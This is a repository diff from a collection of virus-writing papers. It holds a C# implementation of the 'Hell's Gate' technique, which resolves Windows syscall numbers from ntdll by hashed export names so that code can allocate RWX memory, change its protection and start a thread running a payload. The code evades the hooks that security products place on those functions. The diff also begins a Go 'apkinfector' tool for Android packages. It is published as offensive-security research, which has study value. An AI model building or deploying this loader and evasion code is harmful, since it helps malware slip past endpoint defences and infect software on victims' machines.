this.ModuleExportDirectoryOffset = this.ConvertRvaToOffset(this.ModuleNTHeaders.OptionalHeader.DataDirectory[0].VirtualAddress);
|
||||
this.ModuleExportDirectory = base.GetStructureFromBlob<Structures.IMAGE_EXPORT_DIRECTORY>(this.ModuleExportDirectoryOffset);
|
||||
if (this.ModuleExportDirectory.Equals(default(Structures.IMAGE_EXPORT_DIRECTORY))) {
|
||||
Util.LogError("Invalid export address table (EAT).");
|
||||
return default;
|
||||
}
|
||||
|
||||
// Parse all functions
|
||||
this.ModuleExportDirectoryAddressNamesOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfNames);
|
||||
this.ModuleExportDirectoryAddressFunctionsOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfFunctions);
|
||||
this.ModuleExportDirectoryAddressNameOrdinalesOffset = this.ConvertRvaToOffset(this.ModuleExportDirectory.AddressOfNameOrdinals);
|
||||
return this.ModuleExportDirectory;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the address, name, system call for a given function hash.
|
||||
/// </summary>
|
||||
/// <param name="FunctionHash">DJB2 function hash.</param>
|
||||
/// <returns></returns>
|
||||
public Util.APITableEntry GetAPITableEntry(UInt64 FunctionHash) {
|
||||
if (this.ModuleExportDirectoryAddressNamesOffset == 0x00 || this.ModuleExportDirectoryAddressFunctionsOffset == 0x00|| this.ModuleExportDirectoryAddressNameOrdinalesOffset == 0x00)
|
||||
this.GetModuleExportDirectory();
|
||||
|
||||
if (!base.ModuleStream.CanRead || base.ModuleStream.Length == 0x00) {
|
||||
Util.LogError("Module not loaded");
|
||||
return default;
|
||||
}
|
||||
|
||||
Util.APITableEntry Entry = new Util.APITableEntry {
|
||||
Hash = FunctionHash
|
||||
};
|
||||
|
||||
for (Int32 cx = 0; cx < this.ModuleExportDirectory.NumberOfNames; cx++) {
|
||||
UInt32 PtrFunctionName = base.ReadPtr32(this.ModuleExportDirectoryAddressNamesOffset + (sizeof(uint) * cx));
|
||||
string FunctionName = base.ReadAscii(this.ConvertRvaToOffset(PtrFunctionName));
|
||||
|
||||
if (FunctionHash == Util.GetFunctionDJB2Hash(FunctionName)) {
|
||||
UInt32 PtrFunctionAdddress = base.ReadPtr32(this.ModuleExportDirectoryAddressFunctionsOffset + (sizeof(uint) * (cx + 1)));
|
||||
Span<byte> opcode = base.GetFunctionOpCode(this.ConvertRvaToOffset(PtrFunctionAdddress));
|
||||
|
||||
if (opcode[3] == 0xb8 && opcode[18] == 0x0f && opcode[19] == 0x05) {
|
||||
Entry.Name = FunctionName;
|
||||
Entry.Address = PtrFunctionAdddress;
|
||||
Entry.Syscall = (Int16)(((byte)opcode[5] << 4) | (byte)opcode[4]);
|
||||
return Entry;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return default;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Get the offset of a _IMAGE_SECTION_HEADER structure.
|
||||
/// </summary>
|
||||
/// <param name="cx">The section to get.</param>
|
||||
/// <returns>The _IMAGE_SECTION_HEADER structure.</returns>
|
||||
private Int64 GetModuleSectionOffset(Int16 cx)
|
||||
=> this.ModuleDOSHeader.e_lfanew
|
||||
+ Marshal.SizeOf<Structures.IMAGE_FILE_HEADER>()
|
||||
+ this.ModuleNTHeaders.FileHeader.SizeOfOptionalHeader
|
||||
+ sizeof(Int32) // sizeof(DWORD)
|
||||
+ (Marshal.SizeOf<Structures.IMAGE_SECTION_HEADER>() * cx);
|
||||
|
||||
/// <summary>
|
||||
/// Convert a relative virtual address (RVA) into an offset.
|
||||
/// </summary>
|
||||
/// <param name="rva">The RVA to convert into an offset in the iamge.</param>
|
||||
/// <param name="SectionHeader">The section in which the relative virtual address (RVA) points to.</param>
|
||||
/// <returns>The offset.</returns>
|
||||
private Int64 ConvertRvaToOffset(Int64 rva, Structures.IMAGE_SECTION_HEADER SectionHeader) => rva - SectionHeader.VirtualAddress + SectionHeader.PointerToRawData;
|
||||
|
||||
/// <summary>
|
||||
/// Convert a relative virtual address (RVA) into an offset.
|
||||
/// </summary>
|
||||
/// <param name="rva">The RVA to convert into an offset in the iamge.</param>
|
||||
/// <returns>The offset.</returns>
|
||||
private Int64 ConvertRvaToOffset(Int64 rva) => this.ConvertRvaToOffset(rva, GetSectionByRVA(rva));
|
||||
|
||||
/// <summary>
|
||||
/// Get which image section is which a relative virtual address (RVA) points to.
|
||||
/// </summary>
|
||||
/// <param name="rva">The RVA</param>
|
||||
/// <returns>The _IMAGE_SECTION_HEADER structure</returns>
|
||||
private Structures.IMAGE_SECTION_HEADER GetSectionByRVA(Int64 rva) => this.ModuleSectionHeaders.Where(x => rva > x.VirtualAddress && rva <= x.VirtualAddress + x.SizeOfRawData).First();
|
||||
}
|
||||
}
|
|
@ -0,0 +1,51 @@
|
|||
using System;
|
||||
using System.Collections.Generic;
|
||||
using SharpHellsGate.Module;
|
||||
|
||||
namespace SharpHellsGate {
|
||||
|
||||
/// <summary>
|
||||
/// Main class.
|
||||
/// </summary>
|
||||
public class Program {
|
||||
|
||||
/// <summary>
|
||||
/// Entry point of the program.
|
||||
/// </summary>
|
||||
/// <param name="args">Command line arguments.</param>
|
||||
static void Main(string[] args) {
|
||||
Util.LogInfo("Copyright (C) 2020 Paul Laine (@am0nsec)");
|
||||
Util.LogInfo("C# Implementation of the Hell's Gate VX Technique");
|
||||
Util.LogInfo(" --------------------------------------------------\n", 0, "");
|
||||
|
||||
// Only works for x86
|
||||
if (IntPtr.Size != 8) {
|
||||
Util.LogError("Project only tested in x64 context.\n");
|
||||
return;
|
||||
}
|
||||
|
||||
// Load the module and get everything ready
|
||||
SystemModule ntdll = new SystemModule("ntdll.dll");
|
||||
ntdll.LoadAllStructures();
|
||||
|
||||
// Resolve all the system calls
|
||||
Dictionary<UInt64, Util.APITableEntry> APITable = new Dictionary<ulong, Util.APITableEntry>() {
|
||||
{ Util.NtAllocateVirtualMemoryHash, ntdll.GetAPITableEntry(Util.NtAllocateVirtualMemoryHash) },
|
||||
{ Util.NtProtectVirtualMemoryHash, ntdll.GetAPITableEntry(Util.NtProtectVirtualMemoryHash) },
|
||||
{ Util.NtCreateThreadExHash, ntdll.GetAPITableEntry(Util.NtCreateThreadExHash) },
|
||||
{ Util.NtWaitForSingleObjectHash, ntdll.GetAPITableEntry(Util.NtWaitForSingleObjectHash) }
|
||||
};
|
||||
ntdll.Dispose();
|
||||
|
||||
Util.LogInfo($"NtAllocateVirtualMemory: 0x{APITable[Util.NtAllocateVirtualMemoryHash].Syscall:x4}");
|
||||
Util.LogInfo($"NtProtectVirtualMemory: 0x{APITable[Util.NtProtectVirtualMemoryHash].Syscall:x4}");
|
||||
Util.LogInfo($"NtWaitForSingleObject: 0x{APITable[Util.NtWaitForSingleObjectHash].Syscall:x4}");
|
||||
Util.LogInfo($"NtCreateThreadEx: 0x{APITable[Util.NtCreateThreadExHash].Syscall:x4}\n");
|
||||
|
||||
HellsGate gate = new HellsGate(APITable);
|
||||
gate.GenerateRWXMemorySegment();
|
||||
gate.Payload();
|
||||
return;
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,18 @@
|
|||
<Project Sdk="Microsoft.NET.Sdk">
|
||||
|
||||
<PropertyGroup>
|
||||
<OutputType>Exe</OutputType>
|
||||
<TargetFramework>net5.0</TargetFramework>
|
||||
</PropertyGroup>
|
||||
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|AnyCPU'">
|
||||
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
||||
<PlatformTarget>x64</PlatformTarget>
|
||||
</PropertyGroup>
|
||||
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|AnyCPU'">
|
||||
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
||||
<PlatformTarget>x64</PlatformTarget>
|
||||
</PropertyGroup>
|
||||
|
||||
</Project>
|
128
VXUG-Papers/Hells Gate/C# Implementation/SharpHellsGate/Util.cs
Normal file
128
VXUG-Papers/Hells Gate/C# Implementation/SharpHellsGate/Util.cs
Normal file
|
@ -0,0 +1,128 @@
|
|||
using System;
|
||||
using System.Diagnostics;
|
||||
|
||||
namespace SharpHellsGate {
|
||||
|
||||
/// <summary>
|
||||
/// Util class. Used mainly for debug output.
|
||||
/// </summary>
|
||||
public class Util {
|
||||
|
||||
/// <summary>
|
||||
/// Structure used to store the name, address, system call and hash of a native Windows function.
|
||||
/// </summary>
|
||||
public struct APITableEntry {
|
||||
public string Name;
|
||||
public Int64 Address;
|
||||
public Int16 Syscall;
|
||||
public UInt64 Hash;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// DJB2 Hash of the NtAllocateVirtualMemory function name.
|
||||
/// </summary>
|
||||
public static UInt64 NtAllocateVirtualMemoryHash { get; } = 0xf5bd373480a6b89b;
|
||||
|
||||
/// <summary>
|
||||
/// DJB2 Hash of the NtProtectVirtualMemory function name.
|
||||
/// </summary>
|
||||
public static UInt64 NtProtectVirtualMemoryHash { get; } = 0x858bcb1046fb6a37;
|
||||
|
||||
/// <summary>
|
||||
/// DJB2 Hash of the NtCreateThreadEx function name.
|
||||
/// </summary>
|
||||
public static UInt64 NtCreateThreadExHash { get; } = 0x64dc7db288c5015f;
|
||||
|
||||
/// <summary>
|
||||
/// DJB2 Hash of the NtWaitForSingleObject function name.
|
||||
/// </summary>
|
||||
public static UInt64 NtWaitForSingleObjectHash { get; } = 0xc6a2fa174e551bcb;
|
||||
|
||||
|
||||
/// <summary>
|
||||
/// Log an informational information.
|
||||
/// </summary>
|
||||
/// <param name="msg">Message to log.</param>
|
||||
/// <param name="indent">Indentation level.</param>
|
||||
/// <param name="prefix">Message prefix.</param>
|
||||
public static void LogInfo(string msg, int indent = 0, string prefix = "[>]") {
|
||||
#if DEBUG
|
||||
if (string.IsNullOrEmpty(msg))
|
||||
return;
|
||||
|
||||
LogMessage(msg, prefix, indent, ConsoleColor.Blue);
|
||||
#endif
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Log an error information.
|
||||
/// </summary>
|
||||
/// <param name="msg">Message to log.</param>
|
||||
/// <param name="indent">Indentation level.</param>
|
||||
/// <param name="prefix">Message prefix.</param>
|
||||
public static void LogError(string msg, int indent = 0, string prefix = "[-]") {
|
||||
#if DEBUG
|
||||
if (string.IsNullOrEmpty(msg))
|
||||
return;
|
||||
|
||||
LogMessage(msg, prefix, indent, ConsoleColor.Red);
|
||||
#endif
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Log a success information.
|
||||
/// </summary>
|
||||
/// <param name="msg">Message to log.</param>
|
||||
/// <param name="indent">Indentation level.</param>
|
||||
/// <param name="prefix">Message prefix</param>
|
||||
public static void LogSuccess(string msg, int indent = 0, string prefix = "[+]") {
|
||||
#if DEBUG
|
||||
if (string.IsNullOrEmpty(msg))
|
||||
return;
|
||||
|
||||
LogMessage(msg, prefix, indent, ConsoleColor.Green);
|
||||
#endif
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Log a string to the console and to the debugger.
|
||||
/// </summary>
|
||||
/// <param name="msg">Message to log.</param>
|
||||
/// <param name="indent">Indentation level.</param>
|
||||
/// <param name="prefix">Message prefix.</param>
|
||||
/// <param name="color">The color of the prifix on the console.</param>
|
||||
private static void LogMessage(string msg, string prefix, int indent, ConsoleColor color) {
|
||||
// Indent
|
||||
Console.Write(new String(' ', indent));
|
||||
Trace.Write(new String(' ', indent));
|
||||
|
||||
// Color and prefix
|
||||
Trace.Write(prefix);
|
||||
Console.ForegroundColor = color;
|
||||
Console.Write(prefix);
|
||||
Console.ResetColor();
|
||||
|
||||
// Message
|
||||
Console.WriteLine($" {msg}");
|
||||
Trace.WriteLine($" {msg}");
|
||||
}
|
||||
|
||||
|
||||
/// <summary>
|
||||
/// Revisited DJB2 algorithm.
|
||||
/// </summary>
|
||||
/// <param name="FunctionName">The ASCII name of a function.</param>
|
||||
/// <returns>The djb2 hash of the function name.</returns>
|
||||
public static UInt64 GetFunctionDJB2Hash(string FunctionName) {
|
||||
if (string.IsNullOrEmpty(FunctionName))
|
||||
return 0;
|
||||
|
||||
UInt64 hash = 0x7734773477347734;
|
||||
foreach (char c in FunctionName)
|
||||
hash = ((hash << 0x5) + hash) + (byte)c;
|
||||
|
||||
return hash;
|
||||
}
|
||||
|
||||
}
|
||||
}
|
|
@ -0,0 +1,93 @@
|
|||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
namespace SharpHellsGate.Win32 {
|
||||
|
||||
/// <summary>
|
||||
/// Contains all the delegates used to execute the system calls.
|
||||
/// </summary>
|
||||
public class DFunctions {
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtAllocateVirtualMemory native Windows function
|
||||
/// </summary>
|
||||
/// <param name="ProcessHandle">A handle for the process for which the mapping should be done.</param>
|
||||
/// <param name="BaseAddress">A pointer to a variable that will receive the base address of the allocated region of pages.</param>
|
||||
/// <param name="ZeroBits">The number of high-order address bits that must be zero in the base address of the section view.</param>
|
||||
/// <param name="RegionSize">A pointer to a variable that will receive the actual size, in bytes, of the allocated region of pages.</param>
|
||||
/// <param name="AllocationType">A bitmask containing flags that specify the type of allocation to be performed for the specified region of pages.</param>
|
||||
/// <param name="Protect">A bitmask containing page protection flags that specify the protection desired for the committed region of pages.</param>
|
||||
/// <returns>NtAllocateVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate uint NtAllocateVirtualMemory(
|
||||
IntPtr ProcessHandle,
|
||||
ref IntPtr BaseAddress,
|
||||
IntPtr ZeroBits,
|
||||
ref IntPtr RegionSize,
|
||||
UInt32 AllocationType,
|
||||
UInt32 Protect
|
||||
);
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtProtectVirtualMemory native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="ProcessHandle">Handle to Process Object opened with PROCESS_VM_OPERATION access.</param>
|
||||
/// <param name="BaseAddress">Pointer to base address to protect. Protection will change on all page containing specified address. On output, BaseAddress will point to page start address.</param>
|
||||
/// <param name="NumberOfBytesToProtect">Pointer to size of region to protect. On output will be round to page size (4KB).</param>
|
||||
/// <param name="NewAccessProtection">One or some of PAGE_... attributes.</param>
|
||||
/// <param name="OldAccessProtection">Receive previous protection.</param>
|
||||
/// <returns>NtProtectVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate uint NtProtectVirtualMemory(
|
||||
IntPtr ProcessHandle,
|
||||
ref IntPtr BaseAddress,
|
||||
ref IntPtr RegionSize,
|
||||
UInt32 NewProtect,
|
||||
out UInt32 OldProtect
|
||||
);
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtCreateThreadEx native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="hThread">Caller supplied storage for the resulting handle.</param>
|
||||
/// <param name="DesiredAccess">Specifies the allowed or desired access to the thread.</param>
|
||||
/// <param name="ObjectAttributes">Initialized attributes for the object.</param>
|
||||
/// <param name="ProcessHandle">Handle to the threads parent process.</param>
|
||||
/// <param name="lpStartAddress">Address of the function to execute.</param>
|
||||
/// <param name="lpParameter">Parameters to pass to the function.</param>
|
||||
/// <param name="CreateSuspended">Whether the thread will be in suspended mode and has to be resumed later.</param>
|
||||
/// <param name="StackZeroBits"></param>
|
||||
/// <param name="SizeOfStackCommit">Initial stack memory to commit.</param>
|
||||
/// <param name="SizeOfStackReserve">Initial stack memory to reserve.</param>
|
||||
/// <param name="lpBytesBuffer"></param>
|
||||
/// <returns>NtCreateThreadEx returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate uint NtCreateThreadEx(
|
||||
ref IntPtr hThread,
|
||||
uint DesiredAccess,
|
||||
IntPtr ObjectAttributes,
|
||||
IntPtr ProcessHandle,
|
||||
IntPtr lpStartAddress,
|
||||
IntPtr lpParameter,
|
||||
bool CreateSuspended,
|
||||
uint StackZeroBits,
|
||||
uint SizeOfStackCommit,
|
||||
uint SizeOfStackReserve,
|
||||
IntPtr lpBytesBuffer
|
||||
);
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtWaitForSingleObject native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="ObjectHandle">Open handle to a alertable executive object.</param>
|
||||
/// <param name="Alertable">If set, calling thread is signaled, so all queued APC routines are executed.</param>
|
||||
/// <param name="TimeOuts">Time-out interval, in microseconds. NULL means infinite.</param>
|
||||
/// <returns>NtWaitForSingleObject returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate uint NtWaitForSingleObject(
|
||||
IntPtr ObjectHandle,
|
||||
bool Alertable,
|
||||
ref Structures.LARGE_INTEGER TimeOut
|
||||
);
|
||||
}
|
||||
}
|
|
@ -0,0 +1,78 @@
|
|||
using System;
|
||||
|
||||
namespace SharpHellsGate.Win32 {
|
||||
|
||||
/// <summary>
|
||||
/// Windows Macros used for error and success codes and bitmasks.
|
||||
/// </summary>
|
||||
public static class Macros {
|
||||
|
||||
// NTSTATUS
|
||||
public static bool NT_SUCCESS(UInt32 ntstatus) => ntstatus <= 0x3FFFFFFF;
|
||||
public static bool NT_INFORMATION(UInt32 ntstatus) => ntstatus >= 0x40000000 && ntstatus <= 0x7FFFFFFF;
|
||||
public static bool NT_WARNING(UInt32 ntstatus) => ntstatus >= 0x80000000 && ntstatus <= 0xBFFFFFFF;
|
||||
public static bool NT_ERROR(UInt32 ntstatus) => ntstatus >= 0xC0000000 && ntstatus <= 0xFFFFFFFF;
|
||||
|
||||
// Common NTSTATUS
|
||||
public static UInt32 STATUS_SUCCESS { get; } = 0x00000000;
|
||||
public static UInt32 STATUS_UNSUCCESSFUL { get; } = 0xC0000001;
|
||||
public static UInt32 STATUS_NOT_IMPLEMENTED { get; } = 0xC0000002;
|
||||
|
||||
// Portable Executable
|
||||
public static Int16 IMAGE_DOS_SIGNATURE { get; } = 0x5a00 | 0x4D; // MZ
|
||||
public static Int32 IMAGE_NT_SIGNATURE { get; } = 0x00004500 | 0x00000050; // PE00
|
||||
|
||||
// Pseudo-Handles
|
||||
public static IntPtr GetCurrentProcess() => new IntPtr(-1);
|
||||
public static IntPtr GetCurrentThread() => new IntPtr(-2);
|
||||
public static IntPtr GetCurrentProcessToken() => new IntPtr(-4);
|
||||
public static IntPtr GetCurrentThreadToken() => new IntPtr(-5);
|
||||
public static IntPtr GetCurrentThreadEffectiveToken() => new IntPtr(-6);
|
||||
|
||||
// Page and Memory permissions
|
||||
public static UInt32 PAGE_NOACCESS { get; } = 0x01;
|
||||
public static UInt32 PAGE_READONLY { get; } = 0x02;
|
||||
public static UInt32 PAGE_READWRITE { get; } = 0x04;
|
||||
public static UInt32 PAGE_WRITECOPY { get; } = 0x08;
|
||||
public static UInt32 PAGE_EXECUTE { get; } = 0x10;
|
||||
public static UInt32 PAGE_EXECUTE_READ { get; } = 0x20;
|
||||
public static UInt32 PAGE_EXECUTE_READWRITE { get; } = 0x40;
|
||||
public static UInt32 PAGE_EXECUTE_WRITECOPY { get; } = 0x80;
|
||||
public static UInt32 PAGE_GUARD { get; } = 0x100;
|
||||
public static UInt32 PAGE_NOCACHE { get; } = 0x200;
|
||||
public static UInt32 PAGE_WRITECOMBINE { get; } = 0x400;
|
||||
public static UInt32 PAGE_GRAPHICS_NOACCESS { get; } = 0x0800;
|
||||
public static UInt32 PAGE_GRAPHICS_READONLY { get; } = 0x1000;
|
||||
public static UInt32 PAGE_GRAPHICS_READWRITE { get; } = 0x2000;
|
||||
public static UInt32 PAGE_GRAPHICS_EXECUTE { get; } = 0x4000;
|
||||
public static UInt32 PAGE_GRAPHICS_EXECUTE_READ { get; } = 0x8000;
|
||||
public static UInt32 PAGE_GRAPHICS_EXECUTE_READWRITE { get; } = 0x10000;
|
||||
public static UInt32 PAGE_GRAPHICS_COHERENT { get; } = 0x20000;
|
||||
public static UInt32 PAGE_ENCLAVE_THREAD_CONTROL { get; } = 0x80000000;
|
||||
public static UInt32 PAGE_REVERT_TO_FILE_MAP { get; } = 0x80000000;
|
||||
public static UInt32 PAGE_TARGETS_NO_UPDATE { get; } = 0x40000000;
|
||||
public static UInt32 PAGE_TARGETS_INVALID { get; } = 0x40000000;
|
||||
public static UInt32 PAGE_ENCLAVE_UNVALIDATED { get; } = 0x20000000;
|
||||
public static UInt32 PAGE_ENCLAVE_DECOMMIT { get; } = 0x10000000;
|
||||
public static UInt32 MEM_COMMIT { get; } = 0x00001000;
|
||||
public static UInt32 MEM_RESERVE { get; } = 0x00002000;
|
||||
public static UInt32 MEM_REPLACE_PLACEHOLDER { get; } = 0x00004000;
|
||||
public static UInt32 MEM_RESERVE_PLACEHOLDER { get; } = 0x00040000;
|
||||
public static UInt32 MEM_RESET { get; } = 0x00080000 ;
|
||||
public static UInt32 MEM_TOP_DOWN { get; } = 0x00100000;
|
||||
public static UInt32 MEM_WRITE_WATCH { get; } = 0x00200000;
|
||||
public static UInt32 MEM_PHYSICAL { get; } = 0x00400000;
|
||||
public static UInt32 MEM_ROTATE { get; } = 0x00800000;
|
||||
public static UInt32 MEM_DIFFERENT_IMAGE_BASE_OK { get; } = 0x00800000;
|
||||
public static UInt32 MEM_RESET_UNDO { get; } = 0x01000000;
|
||||
public static UInt32 MEM_LARGE_PAGES { get; } = 0x20000000;
|
||||
public static UInt32 MEM_4MB_PAGES { get; } = 0x80000000;
|
||||
public static UInt32 MEM_64K_PAGES { get; } = (MEM_LARGE_PAGES | MEM_PHYSICAL);
|
||||
public static UInt32 MEM_UNMAP_WITH_TRANSIENT_BOOST { get; } = 0x00000001;
|
||||
public static UInt32 MEM_COALESCE_PLACEHOLDERS { get; } = 0x00000001;
|
||||
public static UInt32 MEM_PRESERVE_PLACEHOLDER { get; } = 0x00000002;
|
||||
public static UInt32 MEM_DECOMMIT { get; } = 0x00004000;
|
||||
public static UInt32 MEM_RELEASE { get; } = 0x00008000;
|
||||
public static UInt32 MEM_FREE { get; } = 0x00010000;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,128 @@
|
|||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
namespace SharpHellsGate.Win32 {
|
||||
public static class Structures {
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_DOS_HEADER {
|
||||
public UInt16 e_magic; /*+0x000*/
|
||||
public UInt16 e_cblp; /*+0x002*/
|
||||
public UInt16 e_cp; /*+0x004*/
|
||||
public UInt16 e_crlc; /*+0x006*/
|
||||
public UInt16 e_cparhdr; /*+0x008*/
|
||||
public UInt16 e_minalloc; /*+0x00a*/
|
||||
public UInt16 e_maxalloc; /*+0x00c*/
|
||||
public UInt16 e_ss; /*+0x00e*/
|
||||
public UInt16 e_sp; /*+0x010*/
|
||||
public UInt16 e_csum; /*+0x012*/
|
||||
public UInt16 e_ip; /*+0x014*/
|
||||
public UInt16 e_cs; /*+0x016*/
|
||||
public UInt16 e_lfarlc; /*+0x018*/
|
||||
public UInt16 e_ovno; /*+0x01a*/
|
||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
||||
public UInt16[] e_res; /*+0x01c*/
|
||||
public UInt16 e_oemid; /*+0x024*/
|
||||
public UInt16 e_oeminfo; /*+0x026*/
|
||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
||||
public UInt16[] e_res2; /*+0x028*/
|
||||
public UInt32 e_lfanew; /*+0x03c*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_FILE_HEADER {
|
||||
public UInt16 Machine; /*+0x000*/
|
||||
public UInt16 NumberOfSections; /*+0x002*/
|
||||
public UInt32 TimeDateStamp; /*+0x004*/
|
||||
public UInt32 PointerToSymbolTable; /*+0x008*/
|
||||
public UInt32 NumberOfSymbols; /*+0x00c*/
|
||||
public UInt16 SizeOfOptionalHeader; /*+0x010*/
|
||||
public UInt16 Characteristics; /*+0x012*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_DATA_DIRECTORY {
|
||||
public UInt32 VirtualAddress; /*+0x000*/
|
||||
public UInt32 Size; /*+0x004*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_OPTIONAL_HEADER64 {
|
||||
public UInt16 Magic; /*+0x000*/
|
||||
public Byte MajorLinkerVersion; /*+0x002*/
|
||||
public Byte MinorLinkerVersion; /*+0x003*/
|
||||
public UInt32 SizeOfCode; /*+0x004*/
|
||||
public UInt32 SizeOfInitializedDatal; /*+0x008*/
|
||||
public UInt32 SizeOfUninitializedData; /*+0x00c*/
|
||||
public UInt32 AddressOfEntryPoint; /*+0x010*/
|
||||
public UInt32 BaseOfCode; /*+0x014*/
|
||||
public UInt64 ImageBasel; /*+0x018*/
|
||||
public UInt32 SectionAlignment; /*+0x020*/
|
||||
public UInt32 FileAlignment; /*+0x024*/
|
||||
public UInt16 MajorOperatingSystemVersion; /*+0x028*/
|
||||
public UInt16 MinorOperatingSystemVersion; /*+0x02a*/
|
||||
public UInt16 MajorImageVersion; /*+0x02c*/
|
||||
public UInt16 MinorImageVersion; /*+0x02e*/
|
||||
public UInt16 MajorSubsystemVersion; /*+0x030*/
|
||||
public UInt16 MinorSubsystemVersion; /*+0x032*/
|
||||
public UInt32 Win32VersionValue; /*+0x034*/
|
||||
public UInt32 SizeOfImage; /*+0x038*/
|
||||
public UInt32 SizeOfHeaders; /*+0x03c*/
|
||||
public UInt32 CheckSum; /*+0x040*/
|
||||
public UInt16 Subsystem; /*+0x044*/
|
||||
public UInt16 DllCharacteristics; /*+0x046*/
|
||||
public UInt64 SizeOfStackReserve; /*+0x048*/
|
||||
public UInt64 SizeOfStackCommit; /*+0x050*/
|
||||
public UInt64 SizeOfHeapReserve; /*+0x058*/
|
||||
public UInt64 SizeOfHeapCommit; /*+0x060*/
|
||||
public UInt32 LoaderFlags; /*+0x068*/
|
||||
public UInt32 NumberOfRvaAndSizes; /*+0x06c*/
|
||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
||||
public IMAGE_DATA_DIRECTORY[] DataDirectory; /*+0x070*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_NT_HEADERS64 {
|
||||
public UInt32 Signature; /*+0x000*/
|
||||
public IMAGE_FILE_HEADER FileHeader; /*+0x004*/
|
||||
public IMAGE_OPTIONAL_HEADER64 OptionalHeader; /*+0x018*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_EXPORT_DIRECTORY {
|
||||
public UInt32 Characteristics; /*+0x000*/
|
||||
public UInt32 TimeDateStamp; /*+0x004*/
|
||||
public UInt16 MajorVersion; /*+0x008*/
|
||||
public UInt16 MinorVersion; /*+0x00a*/
|
||||
public UInt32 Name; /*+0x00c*/
|
||||
public UInt32 Base; /*+0x010*/
|
||||
public UInt32 NumberOfFunctions; /*+0x014*/
|
||||
public UInt32 NumberOfNames; /*+0x018*/
|
||||
public UInt32 AddressOfFunctions; /*+0x01c*/
|
||||
public UInt32 AddressOfNames; /*+0x020*/
|
||||
public UInt32 AddressOfNameOrdinals; /*+0x024*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_SECTION_HEADER {
|
||||
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 8)]
|
||||
public string Name; /*+0x000*/
|
||||
public UInt32 Misc; /*+0x008*/
|
||||
public UInt32 VirtualAddress; /*+0x00c*/
|
||||
public UInt32 SizeOfRawData; /*+0x010*/
|
||||
public UInt32 PointerToRawData; /*+0x014*/
|
||||
public UInt32 PointerToRelocations; /*+0x018*/
|
||||
public UInt32 PointerToLinenumbers; /*+0x01c*/
|
||||
public UInt16 NumberOfRelocations; /*+0x020*/
|
||||
public UInt16 NumberOfLinenumbers; /*+0x022*/
|
||||
public UInt32 Characteristics; /*+0x024*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Explicit, Size = 1)]
|
||||
public struct LARGE_INTEGER {
|
||||
[FieldOffset(0)] public Int64 QuadPart; /*+0x000*/
|
||||
[FieldOffset(0)] public UInt32 LowPart; /*+0x000*/
|
||||
[FieldOffset(4)] public UInt32 HighPart; /*+0x004*/
|
||||
}
|
||||
}
|
||||
}
|
BIN
VXUG-Papers/Hells Gate/HellsGate.pdf
Normal file
BIN
VXUG-Papers/Hells Gate/HellsGate.pdf
Normal file
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,55 @@
|
|||
// author: Thatskriptkid (www.orderofsixangles.com)
|
||||
// You can use my kaitai struct for binary manifest.
|
||||
// https://github.com/thatskriptkid/Kaitai-Struct-Android-Manifest-binary-XML
|
||||
|
||||
package main
|
||||
|
||||
import (
|
||||
"common"
|
||||
mydex "dex"
|
||||
"encoding/xml"
|
||||
"fmt"
|
||||
"log"
|
||||
"manifest"
|
||||
"os"
|
||||
)
|
||||
|
||||
func main() {
|
||||
|
||||
//setup logging
|
||||
logFile, err := os.OpenFile("apkinfector.log", os.O_CREATE|os.O_TRUNC|os.O_WRONLY, 0644)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
|
||||
defer logFile.Close()
|
||||
|
||||
log.SetOutput(logFile)
|
||||
|
||||
